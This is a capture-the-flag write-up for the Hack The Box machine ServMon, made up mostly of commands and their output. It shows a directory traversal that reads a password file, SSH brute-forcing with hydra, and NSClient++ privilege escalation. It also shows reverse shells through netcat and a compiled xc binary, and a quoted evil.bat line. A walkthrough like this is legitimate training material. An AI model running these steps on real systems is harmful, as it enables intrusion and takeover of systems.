Previous Page
ServMon Writeup
Introduction :
ServMon is an easy Windows box released back in April 2020.
ServMon is an easy Windows box released back in April 2020.
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ nmap -sCV 10.10.10.184
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 17:22 CEST
Nmap scan report for 10.10.10.184
Host is up (0.053s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
5666/tcp open tcpwrapped
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
|_ jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.91%T=SSL%I=7%D=5/29%Time=60B25FA8%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs\x12\x02\x1
SF:8\x7f\x12\x0f")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x
SF:2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.
SF:1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(R
SF:TSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocumen
SF:t\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length
SF::\x2018\r\n\r\nDocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb2-time: ERROR: Script execution failed (use -d to debug)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 911.51 seconds
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ nmap -sCV -p21 10.10.10.184
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 17:43 CEST
Nmap scan report for 10.10.10.184
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM Users
| ftp-syst:
|_ SYST: Windows_NT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds
Our nmap scan picked up port 21 ftp with anonymous login allowed, so let's examine it:
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ wget -r ftp://anonymous:anonymous@10.10.10.184/
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ tree
.
└── 10.10.10.184
└── Users
├── Nadine
│ └── Confidential.txt
└── Nathan
└── Notes to do.txt
After downloading recursively everything there was in the ftp service, we get 2 potential usernames and 2 textfiles:
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ cat 10.10.10.184/Users/Nadine/Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine%
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ cat 10.10.10.184/Users/Nathan/Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint%
Our nmap scan also picked up port 80:
Seems like we get a NVMS service, let's check if there are any exploits known for it:
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ searchsploit NVMS
------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------ ---------------------------------
NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server Arbi | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack Buffer | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.py
------------------------------------------ ---------------------------------
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ cat $(locate 47774.txt)
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
POC
---------
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
---------
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1%
Looks like NVMS1000 is vulnerable to Directory Traversal attacks, so let's test this:
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ curl http://10.10.10.184/../../../../../../../../../../../../windows/win.ini
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ curl http://10.10.10.184/../../../../../../../../../../../../windows/win.ini --path-as-is
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Following the note we found earlier, let's use that directory traversal vulnerability to get to Passwords.txt:
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ curl http://10.10.10.184/../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt --path-as-is
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$%
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ curl http://10.10.10.184/../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt --path-as-is > passwords.txt
Now with this we can use hydra to bruteforce the ssh passwords :
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ hydra -L users.txt -P passwords.txt ssh://10.10.10.184
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-29 19:23:59
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 14 tasks per 1 server, overall 14 tasks, 14 login tries (l:2/p:7), ~1 try per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-29 19:24:01
So let's SSH as the nadine user:
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ ssh nadine@10.10.10.184
The authenticity of host '10.10.10.184 (10.10.10.184)' can't be established.
ECDSA key fingerprint is SHA256:l00hI7FlitUwW9ndgFDHLzImSDNxQcjLOKxQPRmbzls.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.184' (ECDSA) to the list of known hosts.
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>dir
Volume in drive C has no label.
Volume Serial Number is DC93-6115
Directory of C:\Users\Nadine
08/04/2020 23:16 DIR> .
08/04/2020 23:16 DIR> ..
18/01/2020 11:23 DIR> 3D Objects
18/01/2020 11:23 DIR> Contacts
08/04/2020 22:28 DIR> Desktop
08/04/2020 22:28 DIR> Documents
18/01/2020 11:23 DIR> Downloads
08/04/2020 22:27 DIR> Favorites
08/04/2020 22:27 DIR> Links
18/01/2020 11:23 DIR> Music
18/01/2020 11:31 DIR> OneDrive
18/01/2020 11:23 DIR> Pictures
18/01/2020 11:23 DIR> Saved Games
18/01/2020 11:23 DIR> Searches
18/01/2020 11:23 DIR> Videos
0 File(s) 0 bytes
15 Dir(s) 6,097,006,592 bytes free
nadine@SERVMON C:\Users\Nadine>type Desktop/user.txt
The syntax of the command is incorrect.
nadine@SERVMON C:\Users\Nadine>cd Desktop
nadine@SERVMON C:\Users\Nadine\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is DC93-6115
Directory of C:\Users\Nadine\Desktop
08/04/2020 22:28 DIR> .
08/04/2020 22:28 DIR> ..
29/05/2021 16:31 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 6,097,006,592 bytes free
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
dbXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the user flag.
Now in order to get root access to this box, we're going to use WinPEAS to enumerate this box:
[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ locate winPEAS.bat
/home/nothing/Tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASbat/winPEAS.bat
[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASbat/winPEAS.bat .
[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
nadine@SERVMON C:\Users\Nadine\Desktop>curl "http://10.10.14.13:9090/winPEAS.bat" --output peas.bat
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 35761 100 35761 0 0 35761 0 0:00:01 --:--:-- 0:00:01 247k
nadine@SERVMON C:\Users\Nadine\Desktop>cmd /c peas.bat
As we look for interesting stuff with the winpeas.bat output, we stumble upon NSClient++:
So let's look for available exploits:
[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ searchsploit nsclient++
----------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------- ---------------------------------
NSClient++ 0.5.2.35 - Authenticated Remo | json/webapps/48360.txt
NSClient++ 0.5.2.35 - Privilege Escalati | windows/local/46802.txt
----------------------------------------- ---------------------------------
Shellcodes: No Results
Here we want the Privilege Escalation one:
[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ cat $(46802.txt)
46802.txt: command not found
^[[A^C
[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ cat $(locate 46802.txt)
[...]
Exploit:
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password
C:\Program Files\NSClient++>nscp web -- password --display
Current password: SoSecret
2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler
3. Download nc.exe and evil.bat to c:\temp from attacking machine
@echo off
c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe
4. Setup listener on attacking machine
nc -nlvvp 443
5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
- foobar
command = c:\temp\evil.bat
6. Add schedulede to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
- foobar
interval = 1m
command = foobar
7. Restart the computer and wait for the reverse shell on attacking machine
nc -nlvvp 443
listening on [any] 443 ...
connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
Microsoft Windows [Version 10.0.17134.753]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files\NSClient++>whoami
whoami
nt authority\system
We could follow the steps, but it is preferable to use the other script (48360.py) to automate this. So we're going to follow the first step:
nadine@SERVMON C:\Users\Nadine\Desktop>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Users\Nadine\Desktop> type "c:\program files\nsclient++\nsclient.ini" | findstr password
password = ew2x6SsGTxjRwXOT
And then, we're going to visit port 8443, that our nmap scan picked up as being NSClient++, however viewing the page from https://10.10.10.184:8443 will not allow us to login because only localhost is allowed as we can see from the config file:
PS C:\Users\Nadine\Desktop> type "c:\program files\nsclient++\nsclient.ini" | findstr 127
allowed hosts = 127.0.0.1
So we're going to make a SSH tunnel to the host to access it's localhost:
[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
nadine@10.10.10.184's password: L1k3B1gBut7s@W0rk
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>
Now with the SSH tunnel, we can visit the website from it's localhost by going to https://127.0.0.1:8443 using the ew2x6SsGTxjRwXOT password we found earlier:
Once we are logged in, we're going to make sure that we can get a binary file to get a reverse shell from the box. And as i have discovered, HTB does not care about it's older retired boxes, and does not update them / fix them in case a problem like this happens:
Literally every other writeup of this machine uses netcat (x86 or x64 versions) and yet it is not doable on this box. Therefore we need to get a binary file onto the box that will replicate what netcat does but at the same time bypassing whatever is preventing us from getting a reverse shell (privileged or not) from this box, although we could hypothesize that this box has flagged several of our netcat binaries, we can't know for sure. To do so we're going to use xc which is a golang version of netcat written by xct:
[ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
→ sudo apt install golang-go
[ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
→ git clone https://github.com/xct/xc ; cd xc
[ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
→ go version
go version go1.15.9 linux/amd64
We first need go version 1.15+ to be able to compile the xc binary, then clone the xc repository, then we follow the setup steps on the README.md:
[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ go get golang.org/x/sys/...
[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ go get golang.org/x/text/encoding/unicode
[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ go get github.com/hashicorp/yamux
[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ go get github.com/ropnop/go-clr
package github.com/ropnop/go-clr: build constraints exclude all Go files in /home/nothing/go/src/github.com/ropnop/go-clr
[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ pip3 install donut-shellcode
Collecting donut-shellcode
Downloading donut-shellcode-0.9.2.tar.gz (149 kB)
|████████████████████████████████| 149 kB 2.0 MB/s
Building wheels for collected packages: donut-shellcode
Building wheel for donut-shellcode (setup.py) ... done
Created wheel for donut-shellcode: filename=donut_shellcode-0.9.2-cp39-cp39-linux_x86_64.whl size=56786 sha256=0e6037e945da6f8496c98bdb849a13ca84339af1ef50166a7480d6477d9729b8
Stored in directory: /home/nothing/.cache/pip/wheels/ac/72/45/1a77c4737812b5635cd958224c0ff623ebcef62c15ef083bab
Successfully built donut-shellcode
Installing collected packages: donut-shellcode
Successfully installed donut-shellcode-0.9.2
[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ sudo apt install rlwrap upx -y
[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ make
[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ ls -lash | grep xc
1.3M -rwxr-xr-x 1 nothing nothing 1.3M May 30 14:03 xc
3.2M -rwxr-xr-x 1 nothing nothing 3.2M May 30 14:03 xc.exe
4.0K -rw-r--r-- 1 nothing nothing 2.7K May 30 14:03 xc.go
[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ file xc xc.exe xc.go
xc: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), statically linked, no section header
xc.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
xc.go: C source, ASCII text
So now we successfully compiled xc for both linux and windows, let's test the linux version:
Looks like it is working locally, so let's test the windows version of xc on the box:
[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ python3 -m http.server 9090
PS C:\Users\Nadine> wget http://10.10.14.13:9090/xc/xc.exe -o c:\temp\xc.exe
PS C:\Users\Nadine> cd c:\temp
PS C:\temp> ./xc.exe 10.10.14.13 9001
2021/05/30 13:59:45 Connected to 10.10.14.13:9001
[ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc]
→ ./xc -l -p 9001
__ _____
\ \/ / __|
> < (__
/_/\_\___| by @xct_de
build: QUnVVFdLYEkibcKx
2021/05/30 14:51:44 Listening on :9001
2021/05/30 14:51:44 Waiting for connections...
2021/05/30 14:52:08 Connection from 10.10.10.184:56967
2021/05/30 14:52:08 Stream established
[*] Auto-Plugins:
[xc: C:\temp]: !shell
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\temp>whoami
whoami
servmon\nadine
And we managed to get a reverse shell ! Although it's as the nadine user, so let's get one with the privesc exploit:
PS C:\temp> wget http://10.10.14.13:9090/xc/xc.exe -o c:\temp\xc.exe
[ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc]
→ ./xc -l -p 9001
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ python3 48360.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c "C:\Temp\xc.exe 10.10.14.13 9001"
[ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc]
→ ./xc -l -p 9001
__ _____
\ \/ / __|
> < (__
/_/\_\___| by @xct_de
build: QUnVVFdLYEkibcKx
2021/05/30 15:02:41 Listening on :9001
2021/05/30 15:02:41 Waiting for connections...
2021/05/30 15:03:08 Connection from 10.10.10.184:57375
2021/05/30 15:03:08 Stream established
[*] Auto-Plugins:
[xc: C:\Program Files\NSClient++]: !shell
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files\NSClient++>whoami
whoami
nt authority\system
C:\Program Files\NSClient++>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
d8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the root flag.
Here we can see the progress graph :
